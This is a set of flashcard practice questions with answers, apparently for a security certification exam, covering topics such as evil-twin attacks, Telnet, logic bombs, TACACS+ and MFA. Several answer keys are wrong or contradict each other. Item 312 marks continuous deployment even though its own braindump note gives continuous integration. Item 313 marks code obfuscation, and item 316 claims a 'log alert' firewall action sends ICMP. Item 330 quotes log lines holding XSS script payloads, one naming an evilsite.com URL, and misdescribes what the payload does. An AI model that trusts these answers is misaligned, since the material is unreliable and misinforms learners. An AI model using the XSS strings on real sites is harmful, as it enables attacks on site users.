A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them. Which of the following is the MOST likely cause of this issue?

a. An external access point is engaging in an evil-twin attack.
b. The signal on the WAP needs to be increased in that section of the building.
c. The certificates have expired on the devices and need to be reinstalled.
d. The users in that section of the building are on a VLAN that is being blocked by the firewall

A

a. An external access point is engaging in an evil-twin attack.

Here’s why this is the most likely cause:

Evil-twin attack: An evil-twin attack involves an attacker setting up a rogue access point that mimics the legitimate access point's SSID and settings. This can cause users' devices to connect to the rogue access point, leading to connectivity issues, slow speeds, and credential harvesting (users being required to enter their credentials on web pages).

Signal on the WAP needs to be increased: If the signal strength was the issue, users would not experience credential prompts or intermittent connectivity specifically when returning from other areas of the building.

Expired certificates: While expired certificates can cause connectivity issues, they are unlikely to lead to intermittent issues only in a specific section of the building and would not explain the need for users to re-enter credentials in this context.

VLAN being blocked by the firewall: If a VLAN was being blocked, users would consistently face connectivity issues, not intermittent ones, and it would not specifically affect users moving from other areas.

Given the symptoms of credential prompts and intermittent connectivity near the parking lot, an evil-twin attack is the most plausible explanation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
307
Q

A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm the suspicions?

a. Nmap
b. Wireshark
c. Autopsy
d. DNSEnum

A

a. Nmap

Here’s why:

Nmap: Nmap is a powerful network scanning tool that can be used to discover hosts and services on a computer network. It is commonly used to identify open ports and the services running on those ports, making it ideal for checking which services are running on a server.

Wireshark: Wireshark is a network protocol analyzer used for network troubleshooting, analysis, and protocol development. While it is useful for capturing and analyzing network traffic, it is not typically used to identify running services directly.

Autopsy: Autopsy is a digital forensics tool used for analyzing hard drives and other media for evidence. It is not designed to identify running services on a server.

DNSEnum: DNSEnum is a DNS enumeration tool used to gather information about DNS records and perform DNS reconnaissance. It is not used to identify running services on a server.

Therefore, Nmap is the best choice for confirming whether unnecessary services are running on a server.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
308
Q

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works BEST until a proper fix is released?

a. Detective
b. Compensating
c. Deterrent
d. Corrective

A

b. Compensating

Here’s why:

Compensating: Compensating controls are alternative measures implemented to mitigate the risk when the primary control (such as a patch) is not available or feasible. In this context, a compensating control might involve implementing additional security measures, such as restricting access, using firewalls, or monitoring for suspicious activity, to reduce the risk posed by the vulnerability until a proper fix can be released.

Detective: Detective controls are designed to identify and detect unwanted events or incidents. While useful for monitoring and alerting, they do not mitigate or reduce the risk of the vulnerability directly.

Deterrent: Deterrent controls are intended to discourage or prevent an attacker from attempting to exploit a vulnerability. While they can reduce the likelihood of an attack, they do not address the underlying vulnerability.

Corrective: Corrective controls are designed to fix or correct an issue after it has been identified. However, in this case, a corrective control (such as a patch) does not exist yet, so it is not applicable.

Therefore, compensating controls are the best option to mitigate the risk posed by the vulnerability until a proper fix is released.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
309
Q

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network switches. Which of the following is the security analyst MOST likely observing?

a. SNMP traps
b. A Telnet session
c. An SSH connection
d. SFTP traffic

A

b. A Telnet session

Here’s why:

Telnet: Telnet is an older network protocol used for remote management that transmits data, including usernames and passwords, in plaintext. This makes it easy for anyone capturing network traffic to read the credentials.

SNMP traps: SNMP (Simple Network Management Protocol) traps are messages sent from a device to a management system, typically containing status information or alerts. While SNMP v1 and v2c do not encrypt their data, SNMP v3 can be configured to do so. However, SNMP traps usually do not contain usernames and passwords in the way described.

SSH connection: SSH (Secure Shell) is a protocol used for secure remote management and file transfers. SSH encrypts all data transmitted between the client and server, making it highly unlikely that a network security analyst would observe plaintext usernames and passwords.

SFTP traffic: SFTP (SSH File Transfer Protocol) is a secure version of FTP that operates over an SSH connection. Like SSH, SFTP encrypts all data transmitted, so plaintext usernames and passwords would not be observable.

Therefore, the presence of plaintext usernames and passwords in network traffic strongly suggests the use of Telnet.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
310
Q

An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document’s contents, the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?

a. Cryptomalware
b. Hash substitution
c. Collision
d. Phishing

A

(Community : C 71%, B 29%)

c. Collision

Here’s why:

Cryptomalware: Cryptomalware typically refers to malware that encrypts files on a victim's system, often for the purpose of extortion (ransomware). This attack does not involve modifying a document while maintaining a valid digital signature.

Hash substitution: Hash substitution involves replacing a legitimate hash with a fraudulent one. However, if the original hash value is known or retrievable, the attack can be detected because the substituted hash will not match the recalculated hash of the document.

Collision: A collision attack occurs when two different inputs produce the same hash value. In the context of digital signatures, if an attacker can create a modified document that hashes to the same value as the original document, they can replace the original document with the modified one without invalidating the digital signature. This allows the attacker to change the document's contents without being detected through normal integrity checks, as the hash (and therefore the digital signature) appears to be correct.

Phishing: Phishing is a social engineering attack where an attacker attempts to trick individuals into providing sensitive information or performing certain actions by pretending to be a trustworthy entity. This does not involve modifying digital documents directly.

In this case, the attack method that best explains how the document was modified without invalidating the digital signature is a collision attack.

(Braindump : b. Hash substitution)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
311
Q

A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST describes the type of malware that is running?

a. Fileless virus
b. Logic bomb
c. Keylogger
d. Ransomware

A

b. Logic bomb

Here’s why:

Fileless virus: A fileless virus operates in memory and does not typically delete files as described in the scenario. It focuses on executing malicious code without leaving traditional traces like files on disk.

Logic bomb: A logic bomb is a type of malicious code that is triggered by a specific event or condition. In this case, the condition triggering the deletion of files is the absence of the systems administrator (when they are on vacation). This fits the scenario where files are systematically deleted only during the administrator's absence.

Keylogger: A keylogger is a type of malware that records keystrokes, usually to capture passwords or other sensitive information typed by users. It does not typically involve file deletion based on specific conditions related to an administrator's absence.

Ransomware: Ransomware encrypts files and demands payment for decryption. It does not selectively delete files based on the presence or absence of specific individuals like a systems administrator on vacation.

Therefore, based on the behavior described in the scenario, the type of malware that is likely running is a logic bomb.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
312
Q

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

a. Continuous monitoring
b. Continuous deployment
c. Continuous validation
d. Continuous integration

A

(Braindump : d. Continuous integration)

b. Continuous deployment

a. Continuous monitoring:
Definition: Continuous monitoring involves the ongoing surveillance, assessment, and analysis of systems and networks to ensure that security controls and processes remain effective over time.
Use: It is primarily used in cybersecurity contexts to detect and respond to security threats and vulnerabilities in real-time.

b. Continuous deployment:
Definition: Continuous deployment is a software engineering approach in which every code change that passes automated testing is automatically deployed to production without manual intervention.
Use: It allows teams to release software updates frequently, ensuring that new features and bug fixes reach users quickly. This practice requires a robust automated testing and deployment pipeline.

c. Continuous validation:
Definition: Continuous validation is the process of continuously testing and validating software applications throughout the development lifecycle to ensure they meet requirements and quality standards.
Use: It ensures that each stage of development, from planning to deployment, includes rigorous testing and validation procedures to identify and address issues early.

d. Continuous integration:
Definition: Continuous integration (CI) is a software development practice where team members frequently integrate their code changes into a shared repository. Each integration triggers an automated build and automated tests to detect integration errors quickly.
Use: CI aims to improve collaboration among team members and increase the speed of software delivery. It helps maintain code quality by catching bugs early in the development process.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
313
Q

Which of the following can reduce vulnerabilities by avoiding code reuse?

a. Memory management
b. Stored procedures
c. Normalization
d. Code obfuscation

A

d. Code obfuscation

Explanation:

Code obfuscation is a technique used to modify code to make it more difficult to understand, reverse-engineer, or reuse without authorization. By obfuscating code, developers can reduce vulnerabilities associated with exposing sensitive logic or algorithms that could be exploited by attackers. It doesn’t prevent code reuse entirely but makes it harder for malicious actors to understand and exploit vulnerabilities in reused code.

Let’s briefly explain the other options for clarity:

a. Memory management: While important for preventing vulnerabilities like memory leaks or buffer overflows, it primarily concerns efficient use of memory resources and doesn’t directly relate to avoiding code reuse.

b. Stored procedures: These are precompiled SQL statements stored in a database, used to improve performance and security by reducing the risk of SQL injection attacks. They are not directly related to avoiding code reuse in the context of software development.

c. Normalization: This refers to organizing data in a database to reduce redundancy and improve data integrity. It is crucial for database design but doesn’t address avoiding code reuse in software development.

In contrast, code obfuscation specifically aims to make code more resistant to reverse engineering and reuse, thus indirectly reducing vulnerabilities associated with exposed code logic.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
314
Q

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments? Select 1

a. Authentication protocol
b. Encryption type
c. WAP placement
d. VPN configuration

A

c. WAP placement

Explanation:

WAP (Wireless Access Point) placement involves determining where access points will be installed throughout the building. This decision impacts both network coverage and security.
Technology department: Responsible for implementing the network infrastructure and ensuring adequate coverage.
Cybersecurity department: Ensures that WAP placement doesn't compromise network security by considering factors like signal reach, interference, and segregation of network segments.
Physical security department: Ensures that access points are placed in physically secure locations to prevent tampering or unauthorized access.

While authentication protocols, encryption types, and VPN configurations are crucial aspects of network security and operations, WAP placement directly impacts network coverage, reliability, and security, making it essential for coordination among these departments during the expansion of the Wi-Fi network infrastructure.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
315
Q

Which of the following is an example of risk avoidance?

a. Installing security updates directly in production to expedite vulnerability fixes
b. Buying insurance to prepare for financial loss associated with exploits
c. Not installing new software to prevent compatibility errors
d. Not taking preventive measures to stop the theft of equipment

A

Risk avoidance refers to taking actions to eliminate or withdraw from the risk altogether. Among the given options:

c. Not installing new software to prevent compatibility errors

This option best exemplifies risk avoidance because by choosing not to install new software, the organization avoids the potential risk of encountering compatibility issues that could lead to operational disruptions or vulnerabilities. This approach eliminates the risk rather than managing or mitigating it, which aligns with the principle of risk avoidance in risk management strategies.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
316
Q

A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST. Which of the following actions in the firewall rule would work BEST?

a. Drop
b. Reject
c. Log alert
d. Permit

A

an RST (Reset) packet, the best action to use in the firewall rule is:

a. Drop

Explanation:

Drop: This action silently drops the packets of the blocked connection without sending any response back to the source. This means the connection is terminated without notifying the sender, which can help avoid revealing information about the firewall's configuration or the existence of the protected network.

Reject: This action sends back an ICMP "port unreachable" message (RST packet for TCP) to the sender, indicating that the connection attempt was actively refused. Since the administrator wants to avoid sending an RST, this option is not suitable.

Log alert: This action logs the event but still sends an ICMP message indicating the port is unreachable, similar to "reject".

Permit: This action allows the connection through, which is the opposite of what the administrator wants to achieve in this case.

Therefore, a. Drop is the most appropriate action to block the TCP connection while minimizing response to the sender.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
317
Q

A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would MOST likely contain language that would prohibit this activity?

a. NDA
b. BPA
c. AUP
d. SLA

A

c. AUP (Acceptable Use Policy)

Explanation:

Acceptable Use Policy (AUP): This policy defines the acceptable ways in which company resources, including devices like computers and mobile phones, can be used. It typically includes guidelines on software installation, specifying that only approved or necessary software for work purposes should be installed. AUPs often prohibit the installation of unauthorized or non-work-related software to maintain security, compliance, and operational efficiency.

NDA (Non-Disclosure Agreement): This document outlines confidentiality obligations related to sensitive company information and does not typically address device usage or software installation.

BPA (Business Partnership Agreement): This agreement governs the relationship between business partners and may not directly address device usage or software installation.

SLA (Service Level Agreement): This agreement defines the level of service expected from a vendor and does not typically address device usage or software installation.

Therefore, c. AUP is the correct choice as it directly pertains to defining appropriate use of company resources, including devices, which would encompass the prohibition of non-work-related software installations.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
318
Q

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?

a. Intelligence fusion
b. Review reports
c. Log reviews
d. Threat feeds

A

d. Threat feeds

Explanation:

Threat feeds refer to data streams compiled through artificial intelligence and other methods to provide real-time or near-real-time information about current cyber threats, intrusions, phishing campaigns, malware, and other malicious activities. These feeds aggregate data from various sources such as security researchers, threat intelligence platforms, cybersecurity vendors, and global cybersecurity communities. They are used by security teams to enhance their threat detection and response capabilities by staying informed about the latest threats and trends in the cybersecurity landscape.

Intelligence fusion involves integrating multiple sources of intelligence to produce enhanced insights, which can include threat feeds but encompasses broader intelligence sources beyond just cyber threats.

Review reports and log reviews are more specific activities related to examining historical data or logs to identify security incidents or trends, rather than ongoing streams of real-time threat information.

Therefore, d. Threat feeds specifically describes the ongoing data streams compiled through AI to provide insight into current cyberintrusions, phishing, and other malicious cyberactivity.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
319
Q

Which of the following would be the BEST resource for a software developer who is looking to improve secure coding practices for web applications?

a. OWASP
b. Vulnerability scan results
c. NIST CSF
d. Third-party libraries

A

a. OWASP

Explanation:

OWASP (Open Web Application Security Project) is a nonprofit organization focused on improving the security of software. It provides resources, tools, and best practices for secure coding, particularly for web applications. OWASP offers guidelines, cheat sheets, and extensive documentation on common vulnerabilities and how to mitigate them through secure coding practices.

Vulnerability scan results provide information about existing vulnerabilities in applications but do not necessarily focus on educating developers on secure coding practices.

NIST CSF (Cybersecurity Framework) is a framework developed by the National Institute of Standards and Technology (NIST) to help organizations manage and improve their cybersecurity posture. It provides a framework for risk management but is not specifically focused on secure coding practices for developers.

Third-party libraries are external code components that developers integrate into their applications. While important for security, they do not directly educate developers on secure coding practices for web applications.

Therefore, a. OWASP is the best resource for a software developer looking to improve secure coding practices specifically for web applications.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
320
Q

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations. Which of the following documents did Ann receive?

a. An annual privacy notice
b. A non-disclosure agreement
c. A privileged-user agreement
d. A memorandum of understanding

A

a. An annual privacy notice

Explanation:

Annual privacy notice: Financial institutions are required to send out annual privacy notices to their customers explaining how their personal information (PII) is shared and with whom. These notices inform customers about their rights regarding their personal data and the company's practices related to data sharing and privacy.

Non-disclosure agreement (NDA): This is a legal contract between two parties to keep certain information confidential. It is typically used in business partnerships or employment contexts to protect sensitive information but does not apply to customer notifications about data sharing.

Privileged-user agreement: This is an agreement that specifies the responsibilities and acceptable use policies for users with elevated access privileges within an organization. It is not related to customer notifications about data sharing.

Memorandum of understanding (MOU): An MOU is a document that outlines the terms and details of an agreement between parties before the final agreement is signed. It is used to formalize a relationship between parties but is not related to notifying customers about data sharing practices.

Therefore, a. An annual privacy notice is the document Ann received, as it is the one that explains how her PII may be shared with partners, affiliates, and associates for business operations.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
321
Q

A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?

a. The Diamond Model of Intrusion Analysis
b. CIS Critical Security Controls
c. NIST Risk Management Framework
d. ISO 27002

A

c. NIST Risk Management Framework

Explanation:

NIST Risk Management Framework (RMF): The NIST RMF provides a structured process for integrating security, privacy, and risk management activities into the system development life cycle. The steps described in the question (categorizing the system, selecting controls, implementing controls, assessing controls, and authorizing the system) closely align with the steps outlined in the NIST RMF.

The Diamond Model of Intrusion Analysis: This model is used for understanding and analyzing cyber intrusions. It focuses on understanding the relationships between adversaries, capabilities, infrastructure, and victims but is not directly related to deploying and securing new systems.

CIS Critical Security Controls: These are a set of best practices for securing IT systems and data. While they are valuable for improving security, they do not provide the structured, comprehensive process described in the question.

ISO 27002: This is a standard that provides guidelines for organizational information security standards and practices. It offers recommendations for security controls but does not specifically describe the structured process of evaluating and authorizing a new system as outlined in the question.

Therefore, c. NIST Risk Management Framework is the most appropriate choice for the process the CISO is following.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
322
Q

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

a. Redundancy
b. RAID 1+5
c. Virtual machines
d. Full backups

A

c. Virtual machines

Explanation:

Virtual machines (VMs): Using VMs can provide significant flexibility and resiliency for legacy systems. VMs allow the creation of snapshots, which can be used for quick recovery if something goes wrong after applying OS patches. Moreover, VMs can be easily backed up and restored, providing a robust recovery mechanism. Running legacy software in a VM also helps isolate it from the primary system, reducing potential security risks.

Redundancy: While redundancy is a critical part of resilience, it typically involves having duplicate systems or components to ensure availability in case of failure. It does not directly address the need for patch testing or backups as described in the scenario.

RAID 1+5: This refers to a combination of RAID 1 (mirroring) and RAID 5 (striping with parity). RAID configurations are used to improve data availability and fault tolerance for storage devices but do not provide the flexibility or isolation needed for patch testing and recovery of legacy systems.

Full backups: While full backups are essential for recovery, they do not offer the flexibility to test OS patches in a non-production environment. Full backups alone do not provide the same level of isolation and ease of recovery that VMs can offer.

Therefore, c. Virtual machines is the best choice to provide the capabilities described in the scenario

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
323
Q

A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer’s operating system has been hardened and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the security engineer configure to BEST protect the kiosk computer?

a. Measured boot
b. Boot attestation
c. UEFI
d. EDR

A

(Braindump : a. Measured boot)
(Community : A 57%, C 23%)
Measured Boot is a new feature of Windows 8 that was created to help better protect your machine from rootkits and other malware. Measured Boot will check each start up component including the firmware all the way to the boot drivers and it will store this information in what is called a Trusted Platform Module (TPM)

Measured Boot is intended to prevent boot-level malware.

unlike secure boot, measured boot does’t validate against a known good list of signatures before booting. instead it relies on the UEFI firmware to hash the firmware, bootloader, drivers, and anything else that is part of the boot process. then the data gathered is stored in the TPM.

This boot attestation process allows comparison against known good states and admins can take action if the measured boot shows a difference from the accepted or secure known state.

ChatGPT :
c. UEFI (Unified Extensible Firmware Interface)
Explanation:
UEFI (Unified Extensible Firmware Interface): UEFI provides a modern firmware interface for PCs that includes secure boot capabilities. Secure Boot, a feature of UEFI, ensures that only trusted software that has been digitally signed can run during the boot process. This helps prevent unauthorized software, such as rootkits, from being installed and executed. Configuring UEFI with Secure Boot can protect the kiosk computer from malicious software that might be introduced through removable media.

Other options:

Measured boot: This is a feature that helps ensure the integrity of the boot process by measuring each component from firmware up through the bootloader and OS. While measured boot can provide valuable information about the boot integrity, it doesn't actively prevent the installation of rootkits via removable media.

Boot attestation: This involves verifying the integrity of the boot process, often using remote attestation to ensure that the device's boot sequence has not been tampered with. While important for validating boot integrity, it is more of a monitoring tool and does not directly prevent rootkit installation.

EDR (Endpoint Detection and Response): EDR solutions provide monitoring and response capabilities for detecting and responding to threats on endpoints. While EDR is useful for detecting and mitigating various threats, it operates at the OS level and may not prevent the initial installation of a rootkit through removable media.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
324
Q

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?

a. One-time passwords
b. Email tokens
c. Push notifications
d. Hardware authentication

A

c. Push notifications

Explanation:

Push notifications: This method is highly user-friendly and non-disruptive. Users receive a notification on their registered mobile device and can simply approve or deny the authentication request with a single tap. This approach is quick, seamless, and minimizes the need for users to input additional information, making it a convenient choice for enhancing security without causing significant disruptions.

Other options:

One-time passwords (OTPs): These typically require users to enter a code received via SMS, email, or an authenticator app. While secure, they can be more disruptive than push notifications since users must manually enter the code each time they log in.

Email tokens: Sending a token to a user's email for each login attempt can be secure but is often slower and more disruptive than push notifications. It also relies on users having immediate access to their email, which may not always be the case.

Hardware authentication: While very secure, using hardware tokens (e.g., YubiKeys) can be disruptive, especially if users forget or lose their tokens. It also involves additional costs and logistical challenges in distributing and managing the hardware.

Therefore, push notifications provide the best balance of security, convenience, and minimal disruption, making them the optimal choice for implementing MFA in a user-friendly manner.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
325
Q

A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but have been able to log in without doing so. Which of the following statements BEST explains the issue?

a. OpenID is mandatory to make the MFA requirements work.
b. An incorrect browser has been detected by the SAML application.
c. The access device has a trusted certificate installed that is overwriting the session token.
d. The user’s IP address is changing between logins, but the application is not invalidating the token.

A

d. The user’s IP address is changing between logins, but the application is not invalidating the token.

Explanation:

In the described scenario, the issue seems to be that users who are traveling internationally are able to log in without being prompted for MFA, even though they are accessing the application from different locations. The application’s policy requires reauthentication when the user changes locations. The likely cause is that the application’s session token is not being invalidated when the user’s IP address changes, allowing users to bypass the reauthentication requirement.

Detailed reasoning:

SAML and session tokens: SAML (Security Assertion Markup Language) is used for single sign-on (SSO) and relies on tokens for authentication. When a user logs in, a token is generated and used for subsequent access without requiring reauthentication until the token expires.

MFA requirement upon location change: The policy requires reauthentication (including MFA) when a user changes location, which would typically be detected by a change in the user's IP address.

Token invalidation: If the application does not invalidate the session token when the IP address changes, the user can continue to access the application without reauthenticating, even from a new location.

Therefore, the best explanation for the observed behavior is that the application is not invalidating the token when the user’s IP address changes, allowing users to bypass the reauthentication process required by the MFA policy.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
326
Q

An organization wants to enable built-in FDE on all laptops. Which of the following should the organization ensure is installed on all laptops?

a. TPM
b. CA
c. SAML
d. CRL

A

a. TPM (Trusted Platform Module)

Explanation:

TPM (Trusted Platform Module): TPM is a specialized hardware component designed to secure hardware by integrating cryptographic keys into devices. It is crucial for enabling Full Disk Encryption (FDE) because it securely stores the encryption keys used to encrypt and decrypt the disk. TPM enhances the security of the encryption process, ensuring that only authorized users can access the encrypted data.

Detailed reasoning for other options:

CA (Certificate Authority): A CA issues digital certificates that validate the ownership of encryption keys used in secure communications. While important for overall network security and authentication, a CA is not directly related to enabling built-in FDE on laptops.

SAML (Security Assertion Markup Language): SAML is a standard for Single Sign-On (SSO) and federated identity management. It allows secure transmission of authentication and authorization data. However, it is not related to enabling FDE on laptops.

CRL (Certificate Revocation List): A CRL is a list of digital certificates that have been revoked by the CA before their expiration dates. While it plays a role in managing digital certificates, it is not directly related to FDE on laptops.

Conclusion:

To enable built-in Full Disk Encryption (FDE) on all laptops, the organization should ensure that a TPM (Trusted Platform Module) is installed on all laptops.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
327
Q

A security analyst needs to centrally manage credentials and permissions to the company’s network devices. The following security requirements must be met:

*All actions performed by the network staff must be logged.
*Per-command permissions must be possible.
*The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

a. Kerberos
b. CHAP
c. TACACS+
d. RADIUS

A

c. TACACS+

Explanation:

TACACS+ (Terminal Access Controller Access-Control System Plus): TACACS+ is specifically designed for managing credentials and permissions for network devices. It provides centralized authentication, authorization, and accounting (AAA) services. TACACS+ supports per-command authorization, allowing granular control over what commands users can execute on network devices. It also logs all actions performed by network staff, ensuring comprehensive auditing. Importantly, TACACS+ uses TCP for communication between the authentication server and the network devices.

Detailed reasoning for other options:

Kerberos: Kerberos is primarily used for authentication in client-server applications, particularly within Active Directory environments. It does not provide per-command permissions or the same level of detailed logging specific to network device management as TACACS+.

CHAP (Challenge Handshake Authentication Protocol): CHAP is an authentication mechanism that uses a challenge-response system. It is typically used for PPP connections and does not provide centralized management, per-command permissions, or extensive logging capabilities.

RADIUS (Remote Authentication Dial-In User Service): RADIUS is widely used for centralized authentication, authorization, and accounting. While RADIUS can log actions and use TCP (in addition to UDP), it does not natively support per-command authorization as effectively as TACACS+ does. TACACS+ is more suited for network device management with granular control over user actions.

Conclusion:

TACACS+ is the most appropriate choice for centrally managing credentials and permissions to the company’s network devices, meeting the requirements of logging all actions, supporting per-command permissions, and using TCP for communication.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
328
Q

An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following is the MOST likely cause for the high number of findings?

a. The vulnerability scanner was not properly configured and generated a high number of false positives.
b. Third-party libraries have been loaded into the repository and should be removed from the codebase.
c. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.
d. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

A

a. The vulnerability scanner was not properly configured and generated a high number of false positives.

Explanation:

When a new vulnerability scanner is used for the first time, especially if it's not properly configured, it can produce a significant number of false positives. This means the scanner reports issues that aren't actually vulnerabilities, leading to an overwhelming number of findings that need to be addressed.

Detailed reasoning for other options:

Third-party libraries have been loaded into the repository and should be removed from the codebase: While third-party libraries can introduce vulnerabilities, it's less likely that they alone would account for such a high number of findings overnight, especially if these libraries were already being used without previous issues.

The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue: Memory leaks and similar runtime issues are typically identified during dynamic analysis (runtime analysis), not static code scans. Static code analysis, which is usually what's run on repositories nightly, would not report memory leaks in this manner.

The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated: While this could lead to inaccurate findings, it wouldn't necessarily result in a high number of findings. Incorrect benchmarks might lead to missed vulnerabilities rather than an excessive number of findings.

Conclusion:

The most likely cause for the high number of findings is that the vulnerability scanner was not properly configured and thus generated a high number of false positives. This is a common issue when a vulnerability scanner is used for the first time or not tuned to the specific codebase and its environment. Proper configuration and tuning are essential to reduce false positives and make the scan results manageable and actionable.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
329
Q

An organization is concerned about intellectual property theft by employees who leave the organization. Which of the following should the organization MOST likely implement?

a. CBT
b. NDA
c. MOU
d. AUP

A

b. NDA (Non-Disclosure Agreement)

Explanation:

An NDA (Non-Disclosure Agreement) is a legal contract that protects confidential and proprietary information from being disclosed to unauthorized parties. It is commonly used to prevent intellectual property theft by employees, contractors, or other parties who have access to sensitive information during their tenure with the organization.

Reasoning for other options:

CBT (Computer-Based Training): While CBT can educate employees about policies and security practices, it does not directly prevent intellectual property theft after an employee leaves the organization.

MOU (Memorandum of Understanding): MOUs are typically used to establish mutual understanding between parties in less formal agreements, often related to collaborations or partnerships. They are not typically used to prevent intellectual property theft.

AUP (Acceptable Use Policy): AUPs outline acceptable behavior and usage of IT resources within an organization. While they may include clauses related to data protection and intellectual property, an NDA specifically addresses confidentiality and is more directly related to preventing intellectual property theft.

Conclusion:

To address concerns about intellectual property theft by departing employees, implementing an NDA is the most appropriate measure. It legally binds individuals to keep sensitive information confidential even after they are no longer employed by the organization.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
330
Q

A security analyst reviews web server logs and notices the following lines:

104.35.45.53 - - [22/May/2020:06:57:31 +0100] “GET /profile.php?id=%3cscript%3ealert%28%271%27%29%3script%3e HTTP/1.1” 200 11705 “http://www.example.com/downloadreport.php”
104.35.45.53 - - [22/May/2020:07:00:58 +0100] “GET /profile.php?id=%3cscript%3ealert%28%27 http%3a%2f%2fwww.evilsite.com%2fupdater.php%27%29%3script%3e HTTP/1.1” 200 23713 “http://www.example.com/downloadreport.php”

Which of the following vulnerabilities is the attacker trying to exploit?

a. Token reuse
b. SQLi
c. CSRF
d. XSS

A

d. XSS (Cross-Site Scripting)

Explanation:

The logs provided indicate attempts to exploit Cross-Site Scripting (XSS) vulnerabilities. XSS occurs when an attacker injects malicious scripts into web pages viewed by other users. In the logs:

First request: GET /profile.php?id=%3cscript%3ealert%28%271%27%29%3script%3e
    This request includes a script (<script>alert('1')</script>) as part of the id parameter in the URL. If this script is executed in another user's browser, it could perform actions unintended by the application.

Second request: GET /profile.php?id=%3cscript%3ealert%28%27http%3a%2f%2fwww.evilsite.com%2fupdater.php%27%29%3script%3e
    This request attempts to inject a script that redirects users to http://www.evilsite.com/updater.php when the vulnerable page (profile.php) is accessed.

Reasoning for other options:

Token reuse: This involves reusing authentication tokens, which is not evident from the provided logs.

SQLi (SQL Injection): There is no evidence of SQL queries being manipulated in the URL parameters provided.

CSRF (Cross-Site Request Forgery): CSRF involves unauthorized commands being transmitted from a user that the web application trusts. The logs do not indicate CSRF attempts.

Conclusion:

The attacker is attempting to exploit XSS vulnerabilities in the profile.php page of the web server. This type of vulnerability allows attackers to inject malicious scripts into web pages viewed by other users, potentially compromising their session or performing actions on their behalf.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
331
Q

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to implement a high availability pair to:

a. decrease the mean time between failures.
b. remove the single point of failure.
c. cut down the mean time to repair.
d. reduce the recovery time objective.

A

b. remove the single point of failure.

Explanation:

Implementing a high availability pair for the firewall helps to remove the single point of failure in the data center. This means that if one firewall fails or needs maintenance, the other firewall in the pair can seamlessly take over its responsibilities, ensuring continuous operation and reducing the risk of downtime. This setup increases reliability and availability of the network services provided by the firewall, thereby mitigating the impact on business operations if one firewall goes offline.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
332
Q

A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data. Data leakage is now being reported. Which of the following MOST likely caused the issue?

a. Privilege creep
b. Unmodified default settings
c. TLS protocol vulnerabilities
d. Improper patch management

A

b. Unmodified default settings

